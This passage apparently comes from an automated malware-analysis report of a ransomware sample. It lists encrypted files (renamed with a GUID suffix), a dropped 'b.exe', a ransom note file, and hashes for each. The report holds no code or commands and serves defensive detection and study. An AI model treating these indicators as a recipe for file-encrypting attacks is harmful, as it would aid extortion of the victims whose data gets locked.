SHA1: cebb1b7fe593f04e0c80c970a9b53fb34c5c07a6 SHA256: dd5bddcd5a9f7800ea8cfe8bd7b75e7acda955fbb6d6d3d08cee29c7f759c55e SSDeep: 192:G6rGrjd+m615QHzR8zMKwQvzSDg4WPWiwVkrosa2oYEeMrCfse:VrGrjgPmHzCMKwQ+zvkr9a2oPCfse |
|
|
| C:\Program Files\Microsoft Office\CLIPART\PUB60COR\AN03500_.WMF.-20D3E156-A287-60BB-BBEE-4579C665442A | 10.49 KB |
MD5:
7c5151d33b40acfb838d6081e8826839
SHA1: 804353fffd015eb3abf866081dc100a43e511a95 SHA256: 88a79ccb6f03d446b4c243fa0e21194b8fa29548dd51710a2c4090e84c11ddb0 SSDeep: 192:ftJBMmP/B3NHso813LCW9eVZoqDIPQ1a2/7khDqrZKRcMntzMrCfse:fPBfNHsN7X9eVYQN/7kwccnCfse |
|
|
| C:\Program Files\Microsoft Office\CLIPART\PUB60COR\AN04108_.WMF.-20D3E156-A287-60BB-BBEE-4579C665442A | 3.75 KB |
MD5:
8b43efc1d71fb382cf7cc190156a3f43
SHA1: 4a65649d2a38f52c874a2478d8a9b82bfee2e505 SHA256: 022c36aefd38eb56333fa9a5102a28082badc2a26d220c4f0e57201160859463 SSDeep: 96:imtsG6tnZmVG/vFX7TdlvgR56ZbVVCLzslo:imtsdnZmVyFX7xlvgrMrCfse |
|
|
| C:\Program Files\Microsoft Office\CLIPART\PUB60COR\AN04117_.WMF.-20D3E156-A287-60BB-BBEE-4579C665442A | 7.38 KB |
MD5:
c83039563d4d6263da8e992b38742d70
SHA1: 7e76d72a47fb96b7481d5732c06608346638ed16 SHA256: f6933833ea6cf0061f3c341855f265843fafc9653210bead969e6dd22cdf9489 SSDeep: 192:jQS1wrckgTMLE2TRDmTQRwt4RhuNe0WHgHWNMrCfse:MpLggLEItmUKtWhEaSCfse |
|
|
| C:\Program Files\Microsoft Office\CLIPART\PUB60COR\AN04134_.WMF.-20D3E156-A287-60BB-BBEE-4579C665442A | 4.80 KB |
MD5:
bb70d30ff2c760b0714ed7292b0d14a4
SHA1: a55fd7040e89c9ed490afa88fe45485d1a155e52 SHA256: 66a1d99f29d07f22ead9c8d5620111d4953c5bf55b3d50ea94011cba6cd71186 SSDeep: 96:nsXruJN1qHwN2LeBXDbyMohuEVfPbBj8WOOQ56ZbVVCLzslo:nsXKX276BXaMohuQdj8WOnMrCfse |
|
|
| C:\Program Files\Microsoft Office\CLIPART\PUB60COR\AN04195_.WMF.-20D3E156-A287-60BB-BBEE-4579C665442A | 5.97 KB |
MD5:
45ca5e2164da0bd949cd6a92566307fb
SHA1: 2d4841d42292dc4df452750093d36d4288724a34 SHA256: d712f5f5b57b12b51da55ebd1bccd7d24468fd3ffcc967761adf41bd34d15e8a SSDeep: 96:Yenh8FMz15fHH6AIwjlijjCOBd3GTwfgkfRYI59yfsgTVaE189W56ZbVVCLzslo:YShe+1ZHPI+liaOBd3wwfPRY29gsg5KE |
|
|
| C:\Program Files\Microsoft Office\CLIPART\PUB60COR\AN04196_.WMF.-20D3E156-A287-60BB-BBEE-4579C665442A | 4.53 KB |
MD5:
9fb533d587801821d15d675b3141a6c2
SHA1: 9abd94f44d9817bc2d73298958984c194123a5c5 SHA256: ded133170fe78ef5c0294d3c678a51acbf24a506d59389e334030254b5e6fb7e SSDeep: 96:NBMoSFRbwID2nRd/MSV+kHoQvmx1rX9SOoE5PDr56ZbVVCLzslo:NYFRcID2/MQ+dQv41rX99oE5P5MrCfse |
|
|
| C:\Program Files\Microsoft Office\CLIPART\PUB60COR\AN04235_.WMF.-20D3E156-A287-60BB-BBEE-4579C665442A | 9.08 KB |
MD5:
33c643a98ed70d7defd19d303e7567d8
SHA1: 32df170e1c849ab3813a74022ade3a3db58191a6 SHA256: e6d5bb76119b526e66e9565f943ec19a3d327b4bb6133f9fc49dfe0c9da9fa77 SSDeep: 192:hQc62FqTncvQDYOBFdc8jsfA9fPMRj7vvRaLUly6uGQfWnqisKGMPsCINeJkPMrO:SGCcxOG8jsfA9fGj7vZaLUo6DQfWn1a5 |
|
|
| C:\Program Files\Microsoft Office\CLIPART\PUB60COR\AN04269_.WMF.-20D3E156-A287-60BB-BBEE-4579C665442A | 3.44 KB |
MD5:
9f45791a4ecfcb588ffaf37f2c580b33
SHA1: 922e35da593aaeea97de8c0ed24435caad1db56e SHA256: e6da60e9534daa0d0bd091945d20bd10d64fa15347e422be50324dcf2ac51923 SSDeep: 96:F2kdKdtbwggZCyXrknGzprMc5b56ZbVVCLzslo:UkdKdlwggZRYaMrCfse |
|
|
| C:\Program Files\Microsoft Office\CLIPART\PUB60COR\AN04332_.WMF.-20D3E156-A287-60BB-BBEE-4579C665442A | 5.66 KB |
MD5:
e4b9408637f11fb52415a6d880a8f2c4
SHA1: 657226cf840e636d554447f8883dafe7293a534c SHA256: 0d3960d2c5336da1b711bd2eb37f2be476c62f3e28a8e0a53f8d28da4a4838d5 SSDeep: 96:Xro0Io7mrlt25YSi5W0sYzznJ+C4Y2LP1Z54hg4a+jjGSEq9k556ZbVVCLzslo:WYmxtFSik0sYP8G2bT2w+Yq92MrCfse |
|
|
| C:\Program Files\Microsoft Office\CLIPART\PUB60COR\AN04369_.WMF.-20D3E156-A287-60BB-BBEE-4579C665442A | 6.16 KB |
MD5:
f57b76b4c9f1259cdc1cfc7da5345205
SHA1: 537745169b1674ba422923b744434862aec12472 SHA256: 40239e3cad7029115554ed0597f35ab1d3e96198de8780ef3bfe26681b592589 SSDeep: 192:R/FhxIQwKeWw/s6dvGGNKznqDToKjBHMrCfse:R/GC2TZFDMY6Cfse |
|
|
| C:\Program Files\Microsoft Office\CLIPART\PUB60COR\AN04384_.WMF.-20D3E156-A287-60BB-BBEE-4579C665442A | 4.88 KB |
MD5:
e7908036a7686a1f62a1df26c9db125f
SHA1: 07efd7472041248f994d1e08f08e98f071510120 SHA256: b778b471c58c9d9182530b871120e62213872bae2c728f13beeb3576e4dfab74 SSDeep: 96:wJtus2ysn2bF59lR8Lrwry8UEbIRjMsudJsc20Tu3g7fpB3z7qc:GQ32bF59lRi0ry8nItnudJsc2Ouw7fpN |
|
|
| C:\Program Files\Microsoft Office\CLIPART\PUB60COR\AN04385_.WMF.-20D3E156-A287-60BB-BBEE-4579C665442A | 4.89 KB |
MD5:
6df6ff8a87f8b668d56c210f69e7194d
SHA1: 843ec667e0330e925fedf1cb11d5ba8703b23dc0 SHA256: 9287105539bc59ce2c25b84b500c1c92ad72d12264e05a93dc8060713c9f412e SSDeep: 96:KJnGwkn8L9PlWxvCDhb0dIUlcePYJFA5da5oP24IjCW0FUJQzlIuXoxt:QGd8L9COyIULPYza247FUgl9XMt |
|
|
| C:\Program Files\Microsoft Office\CLIPART\PUB60COR\BD00141_.WMF.-20D3E156-A287-60BB-BBEE-4579C665442A | 27.72 KB |
MD5:
657ee0f18f6ddc5d0b5f3c9824275b31
SHA1: af8ea4f02a57a580cc4b72fdd62f5e6054f8b311 SHA256: c48c670e15f5a4c8b4993ab8f9af51b0dfe04b1ed9dcf4b5c6485e43f14bec58 SSDeep: 384:dOecc6pGNUVICgI/2JJOGs7dCrsxOWNEUV7E1rvgERRl9iPUTv2yJQ3FcYOuGyeh:4eGpGNH59WMWSUC17zl+ju8ekNJe |
|
|
| C:\Program Files\Microsoft Office\CLIPART\PUB60COR\BD06102_.WMF.-20D3E156-A287-60BB-BBEE-4579C665442A | 15.74 KB |
MD5:
45f08ad773790dec024123b71e6153a9
SHA1: 4502ca02be53f0b59eb1b5bd9963110dba8d297d SHA256: 613f497fb0b3d8079071183ac80942ebbb0dbee4eaad3fbf4a0db92b2fa135fa SSDeep: 384:i4anifAYOE4INNPGMrvnA6/vJ4md9LmsHpBtYviXRIdRpYVkLWqRCwKdxMqivf8f:i4auAYOE4INNPGMrvnA6/vJ4mbysHpBd |
|
|
| C:\Program Files\Microsoft Office\CLIPART\PUB60COR\BD07761_.WMF.-20D3E156-A287-60BB-BBEE-4579C665442A | 26.12 KB |
MD5:
ffb35e0a38d3a22db194f3b055a6c001
SHA1: 1a1f39e3ca78359b3fa9652627626be31a8aeff8 SHA256: dcb08bdfb295454b506f022ab3cb36ec72df9e1caaa66e6bf6145c7b2dfd5b89 SSDeep: 768:6WFXaxMFxivMfSi3RGGKrVJ0EgKzaeM9jKqE9Bx8KF7bnbkYQwXtFYqvZTPs/2sZ:hFXMvCiGyAmygtw48Ox4 |
|
|
| C:\Program Files\Microsoft Office\CLIPART\PUB60COR\BD08758_.WMF.-20D3E156-A287-60BB-BBEE-4579C665442A | 23.75 KB |
MD5:
3a8c52d21d97339be5905f00ed087ca3
SHA1: 376ec4f01f85be88e22e2b67e2e2c39bd88ac47e SHA256: 29bffee6857972608033208c349cf575f6dddd0544c84bca59247bf98f123751 SSDeep: 384:GmB5ln37wvmxuD1ZBwpbg91/sPJ3OdKi7VjDWs+JHByL0SgYJzQmrmH985rbAR6Y:GmBHn3UOxUjaEFsPdOdB7dDB0r8zQMax |
|
|
| C:\Program Files\Microsoft Office\CLIPART\PUB60COR\BD08808_.WMF.-20D3E156-A287-60BB-BBEE-4579C665442A | 46.87 KB |
MD5:
6a1751879a10e01a57faf90b0e2deb11
SHA1: dff7279a1448376c21e251dd9edd280ee9efebad SHA256: c27f78dd557548cd62d4810afef68a64cd4759b84fb0c6eeb30b8f2805b8cb7b SSDeep: 768:Kqo4MS13fndvHfA0vRHxgOeM98GMg0PCXzo1MhD7XuxD0w2a:dbrRz6so1MhD7exD0w2a |
|
|
| C:\Program Files\Microsoft Office\CLIPART\PUB60COR\BD19563_.GIF.-20D3E156-A287-60BB-BBEE-4579C665442A | 19.98 KB |
MD5:
4efd0644dce706fee1b7cd965a2e0c2d
SHA1: 78f9a8165217d44f4a87b9d769680bf89cd6e94f SHA256: b45c9476110e1715fa656fc97c17276d1ffc56128b83ccc643ffc494b0355cc9 SSDeep: 384:hNKdZYYB/S5MaxgNEb6UP14JqkH2oBiFs1qg0nR8OL7vDaXU9YlpNUOL7vDaXi:h0ZL/eBxgKb6a4JVkFav0L/vDaXqc//N |
|
|
| C:\Program Files\Microsoft Office\CLIPART\PUB60COR\BD19582_.GIF.-20D3E156-A287-60BB-BBEE-4579C665442A | 15.37 KB |
MD5:
364dd13bd0cd076e301d4fc20c765a5f
SHA1: 5088136c7ef7284f1088a0523a62d22cd35f4ec1 SHA256: 66984a50e786c35154daaa07e668436bf8230d2ff5f41dfc29268e30df3becd3 SSDeep: 384:hjWFWvfXmurlgjcFxGtz9+md+kQb/hVXiGPgmBBkU+YRZ:hjWFWv/1l8cFxGh/EbhMGPgoKUpD |
|
|
| C:\Program Files\Microsoft Office\CLIPART\PUB60COR\BD19695_.WMF.-20D3E156-A287-60BB-BBEE-4579C665442A | 12.68 KB |
MD5:
42a5242306dfa010c322b38eb620c650
SHA1: 3f015ba404fe483864a7c4b5c5c4b84ed62713cb SHA256: 476980e04faa65d6925c55b96c41ad3f0f7fbb849c466416b9e6010c1c83d122 SSDeep: 192:HnEnwBqoXGaeM10mJGXnRMVySHx2JTfY1Yy13PPT78LbfZuPsNi7cBhp+Ew5e:HnEwDyM10zXkCfk5pP8HfZ+i+s |
|
|
| C:\Program Files\Microsoft Office\CLIPART\PUB60COR\BD19988_.WMF.-20D3E156-A287-60BB-BBEE-4579C665442A | 17.88 KB |
MD5:
bca899532ce58632c12fc1d60f835395
SHA1: 24b58e7b9f93443049069e8b7e4554446f2e735e SHA256: b3fc4c6ab96f88f4216532e891c33f9140285e8d28a6903a26313031e0b7a32a SSDeep: 384:pdgr5nrHzn6Lhe9cr3OZqPVwfy3ErSHDsVunkrzVDM9x+iWXjP2v:pirTMzVqEE2A8nk3VI9x+vXjG |
|
|
| C:\Program Files\Microsoft Office\CLIPART\PUB60COR\BL00008_.WMF.-20D3E156-A287-60BB-BBEE-4579C665442A | 12.23 KB |
MD5:
f62e23a49bbe0e7c84ea0db5c6b9a517
SHA1: 9a19e35393a7e617f89546de39c9086be4a94e8c SHA256: 6b19388f44525428175da26742fbde26501bdade6f8af13dad3d45c83f8cccf7 SSDeep: 384:Er1JEYGtq/MZA+JrtVHn+YJm1m5vooeyF:ErDEYnwAWVH+fQolyF |
|
|
| C:\Program Files\Microsoft Office\CLIPART\PUB60COR\BL00045_.WMF.-20D3E156-A287-60BB-BBEE-4579C665442A | 7.68 KB |
MD5:
02d823725fea61ea4451c5f4780886e0
SHA1: 5f26a0e88b02f4308b59c5a720a9092773a7be31 SHA256: eec7524ea932c34361b744207c7ff8b61a6e90bab301c29d011666f751f7e600 SSDeep: 192:Q57T2KT+SZ8/FvK+p6WK0hCNx8LymnUSoiQiL2WRCg:Q57T2KT+Sq/Fy+U508oNnUSoiQid |
|
|
| C:\Program Files\Microsoft Office\CLIPART\PUB60COR\BL00098_.WMF.-20D3E156-A287-60BB-BBEE-4579C665442A | 1013 bytes |
MD5:
84834136ba6dbbcf80350dda9309f6ad
SHA1: c04dacb89d3258d8313545051b59f4473c7f4970 SHA256: 995c44d40c9a2b676558fcc5675e63858dea60d9443950a4129152809bbdba34 SSDeep: 24:t/g6IBA3Hih+KmH951CYVizA4+dNim+H6+bt9tl0C9lPlpPdpFZhvH:1gd0ltdri1mNim+ac9t7jpPdppvH |
|
|
| C:\Program Files\Microsoft Office\CLIPART\PUB60COR\BL00105_.WMF.-20D3E156-A287-60BB-BBEE-4579C665442A | 881 bytes |
MD5:
9365ec0d3462e2e46ae3fb414f904a50
SHA1: 41b7947e80af0ffaafc6ae6b3e6064ddf21f689d SHA256: 21e262fc9dc46986ab07e80800a56cc2405b684e8158ea04c88fb272ed792b01 SSDeep: 24:t/zjlcnrA3HiyAHhN/GAW6Q5250+Sp24f+v/8Aal:1zj20Z0N/GAhQ450+4f+vUAu |
|
|
| C:\Program Files\Microsoft Office\CLIPART\PUB60COR\BL00122_.WMF.-20D3E156-A287-60BB-BBEE-4579C665442A | 9.91 KB |
MD5:
821478b614389667e51e4e8c9f394be0
SHA1: 8b909fdb406d92f38c4b409f1a230a62eb5e39a8 SHA256: 69dc1f240839c9d6fc9bff3122252afb7cdad3775372f8d8348edfd980d9b0dc SSDeep: 192:JvrxDivoiNY+4SzhTUBVbdqGYx3WIDSYo3OQ9QxOWS7LNbh0Kk9odGCGlyOoVM:JvrZivoiNbBhTUBVZMo3OQ94OWS75bh6 |
|
|
| C:\Program Files\Microsoft Office\CLIPART\PUB60COR\BL00194_.WMF.-20D3E156-A287-60BB-BBEE-4579C665442A | 3.89 KB |
MD5:
fc6f5f7580641a3ddb5dd51eed9c3df0
SHA1: b8e6577314e094e30811c7aec1829464bfeba5b9 SHA256: eb72554fe779bbca564f45408e2f5f55891ee5b7c522f0c1ed2a0495167a44af SSDeep: 96:ILWn4j+IEQuPr8eM/K2T5jVVSMbzhALJ6oA0lkb0:ILC6Arw/K2Vrp/Xoj64 |
|
|
| C:\Program Files\Microsoft Office\CLIPART\PUB60COR\BL00195_.WMF.-20D3E156-A287-60BB-BBEE-4579C665442A | 7.88 KB |
MD5:
a1e0da2296f63a64e33a63adeb27bbba
SHA1: b9eb1f026ea10a6b9bbbcdd10fcb727afa9e2a35 SHA256: dc5847e7a718c4156aa369e81e575f390ac83fee13c48ad20926eb0a71bbc04c SSDeep: 192:ds/dAUljFaAa41ikUeJwet5MQAkWwpAjw6W5sb21Vqwj:ds/OUyAaMHUcwRQA4p4/Wl1Q+ |
|
|
| C:\Program Files\Microsoft Office\CLIPART\PUB60COR\BL00234_.WMF.-20D3E156-A287-60BB-BBEE-4579C665442A | 9.09 KB |
MD5:
01c54bad539bec7d5f5d7931a207fb2a
SHA1: fbbc6193bb4ef408203fbd5047d4f233d4dcef4a SHA256: 67dd91154defa536b8f9f911717f25659bd0f58d760c6604082e9b513e6e3627 SSDeep: 192:b/5GtyQvXOQ8/YZkqAsYkENiiDknyXhtYB44wNZDlsK1VbsgGoALmNL1EPS1M42r:b/5Gt5vXOQ8/YZkJsY5Ni8knyXhtYB4o |
|
|
| C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\1rk85P.mp4 | 30.35 KB |
MD5:
114fdbabf6da2c7508aa4772a4832eda
SHA1: 3b166ee93acf9dbeeb21b4623ad2e706803578a4 SHA256: f7fdb70f214fb7dd8ae7c5b594fcd0dae06981cb1d1d74534de66af74db26c66 SSDeep: 768:hwENIWwAdJZTuBT6LPRHBJu3jJizmNoxaGZweae:gWwADZTuBgRHW3jJizm2xDT |
|
|
| C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\b.exe | 2.68 MB |
MD5:
fc567799b91d2020f9d756282dae2edf
SHA1: c76fe5112cc24347b31f3c3dc5485a01c3e2debd SHA256: 62bcddc16c633da20dd5b41ebda1fc304707ab3c9fdb22431e2a0f41190ee3e6 SSDeep: 49152:aw80cTsjOWa7dExFV4ZncpsD/8g8SIybfNsgEtI/C7m3knlSaM:f8sjOGxmcpw/DJIyjNsgr/omOlm |
|
|
| C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\dY0yl5mK9vD.bmp | 32.19 KB |
MD5:
dabec24868f184fb863cb8052f4086a1
SHA1: 167d49fff8d3176c9cfb705f3fa90daa76a03449 SHA256: 59cfbcd82a25dba389d04b21ecf649827b6fa28998a9eff04c137f365ee6ceed SSDeep: 768:60pUxEbUFBdiA51ga9JH1zxBthBB2euYw2xtIABbABQe:60pAEIdiI1ge3B72HYwWIAmF |
|
|
| C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\ejaysz9GSkSB.png | 84.31 KB |
MD5:
a2df6577c23571cecd2c656b0331355f
SHA1: b42cb5cd12deb7c61e0dc57b26cc05d3391a247e SHA256: 36ab1548724aebba92c51ba7aed680ede70bd479124c1ae9663f4730b68988ed SSDeep: 1536:LMR7tXvB6kuXUffw88Hm8iF6cn6j0sj1AmCfPWPgiVRI07v8Q7Z2FxhzGRIv:LMRmkuUP8iF76F3Kqginv8Qaxl1 |
|
|
| C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\H4aSLRpC.jpg | 15.56 KB |
MD5:
7f8699e22e859784ae64e71d966a5234
SHA1: df67dd0f19cc4ca94822414e3496cff4abc3101d SHA256: 97655a92f16629aeb0fa058de56ef5e7a2f91fca5a05814c690c922b7d0bd3e8 SSDeep: 384:IONQOOTNU3pp9CUn3ZWmifGjt6M7mOZqsEUGLApKAG3ozhmCfse:I0QApAU3YmkGRNzZRGLAs3Aie |
|
|
| C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\I4Iad0fPEqg6-9Mh.ppt | 22.10 KB |
MD5:
6463c30ff920ea2efc43a6c5fff465dc
SHA1: e021d6b7720424d1e61c682e04e2204994153c99 SHA256: ba9dc09c4f696e171a52c6ac77f39d9be3264d2e40ca7771d96ba84a38729f4e SSDeep: 384:gdBEO+CwSS5eExRm5sxKLNsVMzEi83+f/zcqAFFT1rORM0ERmCXiHwfb7IguCfse:HCS5eEq5sxKZgi8RFZrO5EUOiHwfore |
|
|
| C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\KfAMOG30Jk_h.mkv | 44.74 KB |
MD5:
da6e8d5746c3b90f305a1b036ab1771b
SHA1: f9fcce90a5d01de2ac60265005d4644ddda5f213 SHA256: 4c02c70111d032229e419e2306e6395dccaaf382467efafda84d316fd2038cd0 SSDeep: 768:issvwWvjNK9a6KW9XpjRdv3idz+Spu7KjGAQ1QoCOwThWkgas2ue:iJrvUlNndi+mu7KjGfQo9wThFg07 |
|
|
| C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\rTuCnu4wqEdHxm7AJY.xlsx | 67.65 KB |
MD5:
ef167ffb6adb6b476c3a9eb4f4458f0e
SHA1: 2e8c533911079d09cccef698997269cfb18cb0b6 SHA256: 197d6f94d7ad13c1cf0de14057c5547cfea90949a607afe3279fdee948ab18b8 SSDeep: 1536:ptavD6HxL0wvvK/stuxJwkwX+r0ialNUSivgHQ:pGUBtAyXyclNUvgHQ |
|
|
| C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\Vo6kTwdLO.bmp | 69.67 KB |
MD5:
a11fb5b1e56e2ad15efd20d2d6aad61a
SHA1: 796b4043fd58dfb057c66d2ae8de1ae96dedebf4 SHA256: 7aa2fc3b75237ac61a98ff004b8874242e471a737cdfba63442e706814bcce8e SSDeep: 1536:C7F00KPvYPoX++ydGjGoM3B0HWxxfBnSBeCPG48GOEFUnt+:CwXcoXPyd1B9xfRSXPGpEFH |
|
|
| C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\VYZTfBZ-0.m4a | 87.01 KB |
MD5:
bda8150c1abd965e44a6f5760d218a15
SHA1: 7f81c399d1b3d3f691d9f80d6ab14bcafe4d84d4 SHA256: 5eab4d4105798994bff32f522d2147d23b0e922fda38b72b4f46fd5c01b5df82 SSDeep: 1536:9E3HhPsD3cvtbnJasUBIg0UGfgbKHRth8Z2yBHvxZki8hisP4Kbbv7:m3HhPs8asUD/2cZZsrvv7 |
|
|
| C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\wC JYi\-yeC580iAmxs.jpg | 59.10 KB |
MD5:
e29d04bef85fafac8cb06be5d0f409a9
SHA1: f79edfb830cec6791a808031a67b609200cbd754 SHA256: 9d73654b52629c7bf9e2c073f50b340e218cc9c1d8f0aadbc7e8ccbbbd5e6faa SSDeep: 1536:Do1FLMYRr5Ecb+TuPntEqnsrApG0MEL/HFGdultE:D2BRVX+Cnu9szj4uI |
|
|
| C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\wC JYi\XeKZ1lckwCS6l.mp4 | 26.21 KB |
MD5:
1d317a08458bc81bb82db25f16fe6cfd
SHA1: 6e21009fbd4c607a3206ead15cb8845bc46ba962 SHA256: f729da91aad7bc1c93ba6795ea2f78352f2f8cecf8cdecce7f0d79d404cb4df6 SSDeep: 384:sMRZC6IrBUzdKRBnNLL+rQI6tFAY72lQFLLxQI9yBFY2qgWE9YCfse:s0ZUrLRBnM4+YRLe8MC2qPe |
|
|
| C:\Program Files\Microsoft Analysis Services\AS OLEDB\10\Cartridges\as80.xsl.-20D3E156-A287-60BB-BBEE-4579C665442A | 18.31 KB |
MD5:
387ecfb046431e845a6dab05c3cc9c67
SHA1: 30a92d82ddaf323f99a56f24e1c675f16ba103b0 SHA256: 1cdbdba31c56a158686bb591a4de9082d076299d5d5d23fd3feb94231f3b69bc SSDeep: 384:tKU9ZZOuMUtjK80nBT8jyFn7rm5jxbI3bt8oCyK+usm6Cfse:tKyZRY8gB8Olq5jhILmbNye |
|
|
| C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\wC JYi\ey6ais\3aNP40yASecb0.wav | 55.06 KB |
MD5:
a117641602c89d03f2150e7ce6372563
SHA1: 53385c1266a027df11f39265942d692fc5c523a0 SHA256: 65d471ed9eecd1048a1cdf395cfd53afd53ded730c10c2b2fb5beaed580da6d3 SSDeep: 1536:C71oFQYBD7ROetvCkO80HghSH4HyWs7QCR2gucil/Hx8K:C71OQeDtp4kOpA8YH13Cs5J/Hxh |
|
|
| C:\Program Files\Microsoft Analysis Services\AS OLEDB\10\Cartridges\as90.xsl.-20D3E156-A287-60BB-BBEE-4579C665442A | 19.77 KB |
MD5:
930ad3ce5cb1525043930ac77ed910d5
SHA1: e5589b7adccf00896e09ccb75891e10e7eddeef5 SHA256: 98e0fc33048fb872bd8ec6a790dc67e1cbd1f48fda5f84f743825a42d4d1a105 SSDeep: 384:3pDrN+tu8qdnV9Cp/8rqyBhkDP6kLoNetOSm71+GzgxQAoOCfse:RrN86CN8mohkD6kcNeDqtgeAoke |
|
|
| C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\wC JYi\ey6ais\80 K90vK.mkv | 88.25 KB |
MD5:
ca4abee8b7b9c27e83beb73520e5db58
SHA1: ba5000af71d520787f9dc1828870671cd3c45c0c SHA256: d3eb85d35689922188f62384fcff18af4edec3674216584334768523ef80eb88 SSDeep: 1536:+NEpcyFnv0KIT7D9xdgjUGAzv3EHMDSqLyJCkmA90zpR3P/lD2xyNBWFbhFo0PSI:+NCcyFnv0h9jRUw6g333nBIQwSLCLG/A |
|
|
| C:\Program Files\Microsoft Analysis Services\AS OLEDB\10\Cartridges\Informix.xsl.-20D3E156-A287-60BB-BBEE-4579C665442A | 31.69 KB |
MD5:
75975e4b811bd8d3624c89151cade8dd
SHA1: 1b1145d572c4c0e2b307d99bbeb15e6fbfe32013 SHA256: 127f0d1daf94195060200670514597271cf8cef58390f730c81a13aac6a4c250 SSDeep: 768:iW72+VzVgCQUCFUkpSWMD9k6WydumZyUcmEuBgY3Gufl819WXe:p72+LloPEmVyBZyJmEGj981QO |
|
|
| C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\wC JYi\ey6ais\E6fI.xls | 41.96 KB |
MD5:
90fd2fafe03f1dbddc2bf1b707525cde
SHA1: ec4711b76549b9ce20ec52b975b95e0f9d4866af SHA256: f109e0feab731c15da1e9964faf8d5035c7003d5029798945805be1f0681bd62 SSDeep: 768:NmhyWiTWMQUd8tytel5yUdY1T19embfDqccEGbg+TfZzpzSYE0/K/HB81yfNYave:sxiTxdSyteeo+eMfDqnxU+TZNzSXz/Hw |
|
|
| C:\Program Files\Microsoft Analysis Services\AS OLEDB\10\Cartridges\sql90.xsl.-20D3E156-A287-60BB-BBEE-4579C665442A | 40.05 KB |
MD5:
daa68c2f90ec05b66e8248c24de4655b
SHA1: bedcf4a88d3389a27300e8c8a7cda66335c44707 SHA256: 6067ed7876a23778823f148c826a64a339d6a79152893191be3b79dae433d6dc SSDeep: 768:ZR7ao20tWhs3EC35N3dwny1F2p53Xb6ZS6pvKA1z91mU0vW/A9ioTXfe:ZtaB0tuajGW2XKS8n1Hl0+8PG |
|
|
| C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\wC JYi\ey6ais\RjQLaKs8b3A4.m4a | 27.03 KB |
MD5:
08ee6846ed679d7ff59f67da4e65249f
SHA1: 77cacc5c43a4de03419ed410375b970c5bc4cbfc SHA256: 8007099cb9955286bf6ae1a64932e2a89fdf4bcd58cbfab32fb7ea4c2850309e SSDeep: 768:W5tAkpxllnx/YDY2YE1i9ygQg7SFS6LQe:WQk/ztsisOSFS6J |
|
|
| C:\Program Files\Microsoft Analysis Services\AS OLEDB\10\Resources\1033\msmdsrv.rll.-20D3E156-A287-60BB-BBEE-4579C665442A | 652.34 KB |
MD5:
98f63f0edf10967fc7b57c099643895f
SHA1: ce74939e531bcff125b9881e765342dc4740f8b4 SHA256: b98eff46313eb6b6255344b8ffda7e8826c0341e3019d76ccf9e8051c25f09d1 SSDeep: 6144:wj6VG5g4GLrhwG4AQWmi3fMCcJCDr1si04bULl:wj6VG5g4GLrhwG4AQWmi3fMCcJCU/Ll |
|
|
| C:\Program Files\Microsoft Analysis Services\AS OLEDB\10\Resources\1033\msolui100.rll.-20D3E156-A287-60BB-BBEE-4579C665442A | 15.99 KB |
MD5:
c14db284187789df028439e746ab2e63
SHA1: 7ad4584d96881f474df70d0d99dfe4d6f0544152 SHA256: 4123806f46ebbbdfda44124d7efc07177d53caa7973c2b6231a895ee4d8241d2 SSDeep: 384:AMhINKl6NZWPCtrzVYQI9LqGLJ/6jwxZs3TbH3uQScCfse:Ap8Am5x9u8xYTbeQSCe |
|
|
| C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\wC JYi\ey6ais\V7c X\D3fZ-WqBjG.flv | 56.99 KB |
MD5:
3e09e114716ef986a0dcdf9c0740e2c6
SHA1: ee453579b890bd621d021a9fbc38aebd4b174c91 SHA256: 85f44dcbd62732dd489a3f542b997b8611e6cb6048aa4b2beb2df45926473664 SSDeep: 1536:B+BrSFVEnvi2LV4zyMeRafLPG7JoBFjEvZW557Kugy5PlCw:A/vp6yvDJQdEvZ7ktT |
|
|
| C:\Program Files\Microsoft Office\CLIPART\PUB60COR\AG00004_.GIF.-20D3E156-A287-60BB-BBEE-4579C665442A | 10.28 KB |
MD5:
4c1d465281bdb156f38b0d019973dcd1
SHA1: 43663f267b23787c2e8b15ee404205c276950470 SHA256: 7ee52513f88d3a53d93c978640212e15144ed41f059cbfce4aa5d31a7929dd4d SSDeep: 192:CVqwvt9E7UbPWU+stTBNHr5617tvrQ0NPfUlBhdaNm3zn7/nIv9/MrCfse:ClQgbOoTPHVixXUlrsNKLIv9kCfse |
|
|
| C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\!!! YOUR FILES ARE ENCRYPTED !!!.TXT | 959 bytes |
MD5:
c9a401457153387d42814c4e6524c77c
SHA1: efcf9cd887b07e7115817ec86428355a39673089 SHA256: 9d59fb41fd638cc5dd004f8dc3e6534fcef8c5ec31c0792362afed0cdf5044e4 SSDeep: 24:mu8yNUZVJMWFeiQLXeAOAY1vcxAOAztXeqVJP0av:mCNUzJQVbfvuUGvRXbPVv |
|
|
| C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\wC JYi\ey6ais\V7c X\J1J_05qqT.mkv | 93.93 KB |
MD5:
ff9d909e78e410d5d482dfe00dc7e6ed
SHA1: 9c518f562ea9ca6caa5ebe26966c8cce6f37f17a SHA256: 41dda34fcbbe88b2b9fd25868477132073dfe055fd2faff0730c805c780201f0 SSDeep: 1536:WwD6F4Xl3ScAavIpfiAog/UZCErFgKu8pJNEVWvT6qNvYWLsW2R2tMHt2JGSuHYA:WwWwVScAZT8CEyKBSwJLac02JUHY0eBk |
|
|
| C:\Program Files\Microsoft Office\CLIPART\PUB60COR\AG00011_.GIF.-20D3E156-A287-60BB-BBEE-4579C665442A | 8.52 KB |
MD5:
eb76e1e103c023943fa4ed0d251c9299
